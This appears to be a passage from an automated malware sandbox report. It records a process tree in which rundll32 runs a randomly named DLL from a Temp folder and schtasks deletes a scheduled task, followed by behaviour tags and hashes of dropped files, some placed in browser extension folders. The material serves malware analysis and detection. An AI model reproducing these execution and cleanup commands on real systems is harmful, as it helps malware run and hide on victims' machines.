C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\UgGWSnfj\lLUcjJN.dll",#1 /kYsite_iddet 3851181⤵PID:4700
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\UgGWSnfj\lLUcjJN.dll",#1 /kYsite_iddet 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1252 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IypqguOSOyxhMfXuI"3⤵PID:3628
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54618744d15d6f3c7333291c5089ca110
SHA17d3431e9294426bd767061cc9a41cf86cfc9ce0f
SHA2564b0d6f1dd4f9d6fb02b7d819e71723462e885a9835d17e1f9ff5a2a8bc7f29cd
SHA512b0d8ab2a88ea8fb85449d4f7d4d98526e06b11bc3167ff199a18833311b58f04973f245bcc58717c7d80b60f5923b3a14bd6f784be59fca139d7d4ff8701f321
-
Filesize
2KB
MD598468260dc070a31a07abb43e8bd086b
SHA16aaaebc024342fbbc008cb50dcfee950915650c9
SHA2566e1a2f6ec7fe29a20295580364a8161a8a777f5abeba92d5265b459dd7a09a29
SHA512eb76f05560ecfcde32b395da9ae5bead1903b6aa97ae397f5107d86fab0858350014e479e5c7c304d72357fc22b48a0c99c1d659e42f115d9eef309adcb28a73
-
Filesize
2KB
MD5ceb5dd02232459fe04691f493aba940c
SHA1f035d784fd3ad343d1aed7665ca624d2f74c57a9
SHA2569a3a636e83dbc18fff4bda869cede85c58874f467efb48294982e23e9fa7b955
SHA512385dd42330e68dce637c2fd44ab1b7d4ffde30e57f35d85f66d28b9dce71194f5c7aae1d2a7f47e18dd46702dedb0741b4ce59ce7b96c40ff560ebb8efb3f74d
-
Filesize
2KB
MD53b5c38075c1256ae8a25add4d615feb5
SHA16a00f1cc0c124f11d70947b63e272636d9d647a2
SHA25622a0bb4e3d0d2149cf967ba0ac12b04da1567f46a7283c7ffc423ffa020828ad
SHA512ff3d9f56138cd1fb425e3a30704b3b817fd34fe9aef57b52230d2ef42bc1896de683e2b16d3bc1867957bf3bae75f951b2268691ab9b305ae691ede220049950
-
Filesize
2.0MB
MD5b97daa37e27b983b0ff5e9b5528de8b6
SHA1f0275978fda80062dd8679a38feacbaa0e88547a
SHA25642fee9d500d7255434d8f8d4fc803ced0954416009b03be6895667e64dbbcc65
SHA5121963c46c63a00aa611d02aa90c895ddfd2e336c095b17c5d0c834b7315cc088e0e8e82ec27ba68744a973352fe8efec54433489148703949927a92e6fdbd429c
-
Filesize
2KB
MD5a512a74c9c036eae6f049c0ce78a02d5
SHA19bb10886db173bb02d6c911f4e9678a544b03bf2
SHA256b297b79bb0b8b5bc1b56db79fe8649ae534e07d07f2d48b9ae2bed8b4dbc0937
SHA5122418fa3bd2556bdae46a7b8593c6133c3fc196fe118754beaaf32e6a8ac223fa57c82adf8cc39e7ed94ec2c51b4d6a2e95ca4c4c24adc9ac77fa15004b1316ac
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5f56dbed78535be07c46a8063e2c60a2a
SHA122f0ea9ef577d5466c97e262304c4337ec82b8b2
SHA2567aedf283ee1e897b12f3eec591ee636ade07e5e2e48b6c19acef065bbac2c5c5
SHA512c8a6e95eeaff4ed4d521524064700c24be8785fa0488e4e711b53bb93ffafd979e29ed1add50445f6e5472591dc1d8fbdea78152d1adab4dc59d7c0f3d5a8cf4
-
Filesize
35KB
MD52adcaa9e7682f01e5c03b5f2b2d56b09
SHA1c29e00753cd0b2cb757fc0b1b53b383358fe35d2
SHA2565a315ff0b2a35dbfefb7a7c8cdc738d6f250bb5a41eb50d173af2a504c5af0e5
SHA512c3c7ea3efc640e4d7861807476a3043bc1cd17b21e586a0e7fb43f7a2aa6a6329928d902660d06c54c2880ceaa6e4b8468e4cae1b2601ea6c9840be72f4f821e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5fc84fc5e1a7692ebe1eeb67f64182e03
SHA1953e290b7652f52dbcae57b92a2c92ba058286de
SHA256ee37c4e3020c8cadce78de2f3a949b09f2c15bdcf6e52117d43726ba0e0b13c3
SHA512f7475909779954505f644b123042c5452806923b2130a49be3bb1e90422ad0bca0491b3033256c265e585d1d4c3f25d17e2ca6c94a129c3f3fe896522fbed3be
-
Filesize
11KB
MD50303f9ff6c7f3e683c74a382a9dc3c3e
SHA12595df20ac07732820b66a2b172437f493291422
SHA25673f34b1b285341957fb8ac95e9cc9580ff0b83515788612d3f043e32892e8346
SHA51208e8e6478903ecd94ade9a84802106081e90c5168ee1e0bdccda37ea5bbfa4941b313b854502773f67896dea0dfb757024b4d6580f3dfd3eb8d3bb4bbf09696f
-
Filesize
6.7MB
MD516ae562d94dcce83d2cd6da34596833d
SHA1b6f1087b5f791713001ad414543ba9fa3c12f884
SHA2566fb9d6c67c662830e76ae56dd13ba80fcc60ba2a1af0307776dfce30b995683a
SHA512aa440fd88c57d54b54173c998d02509f4363620fafaaa3907e162a01de61012611bdd4f6e3c7dce525225ae697c54ed6cd35b140d40fcfc76087b9b4fa2b5d87
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD59224d81bcac01533428197040a47b7a3
SHA1f0141dcb193f29147dc385995141a7d18685915a
SHA2569e786d4b3365dad870615b0b59f8b3289533e13dd33cd8453e450604c1229436
SHA512532f2388bae7298773003495b8e2f73924335fede1f07739f420c1f2f511203a6020efd1f6bf2cd9f3117feebdb0a0019a310c14753b6f9d9c0d4f625eac8eed
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD528854213fdaa59751b2b4cfe772289cc
SHA1fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA2567c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA5121e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5a97a0811a392f35ab828517f572c39fe
SHA185f33b6a03fde526ab9c65a1969b4a6895af4df6
SHA2568f2cfefe8e735e79739d2fd5ae0cf471ff44eeb6e08f81bf4d9dca8c3adeed52
SHA5129f7e67d1e8eb402360f7ff5ddc3d68d70f40b00a71b57a53e02a13e6a64758ee4bf05b447a15158628e95a969d58d0564e052a8763244f609ce168713fdad2e1
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD59407eb976643fee3bee16f7def580211
SHA1e563d2bdfbb57466a804caf34d5e23cf1b91eceb
SHA256866d1dc1aae0609f32abc493cd4a89fa01913f08f9dabdcbe0ce0dfa6f104cf0
SHA5121f6600e6a2913a86ac9c83100bf9d7ee2edb56289266b85fc9c0e6e358cd263ee9d6d473bfd643fae4207556584b861db34e7a39d6f78b030bf9299d7e18bd65
-
Filesize
6.4MB
MD57e7d1734fa1d84d40a690218aa21a449
SHA16648a3e46a62c4f81fa68e58b645d390bc80534a
SHA256c4989b8f312865d911df20e27445f3371d90c1e5f89f0bec54329527f16360b8
SHA512f2d6bca7dd5d94dd2eb3f4633161e745c1f6036a0dd275fd3ddfccb4975ef0598a0579324ffd5dc3a320b1e0e33698b8d4e3f7d185cabf6a6b6ec6a853258f76
-
Filesize
6KB
MD5b2865e186121a2b7eeedff1c3d6e89a3
SHA17794ff3dda1fe3715aed6039abaf96025fcda95d
SHA256b8157cc068c8ce6f196fccc5319dac7e1e19cf4310916ef1abaa035c184d9d11
SHA5122c05acfe45bb77568a41ee34370c69346722b64caf4d98ed2493f7a4f9ce91020e9473b9ffbefa35ba55e9585e2a555618ca19f41a9b689b461e700a2975e9c6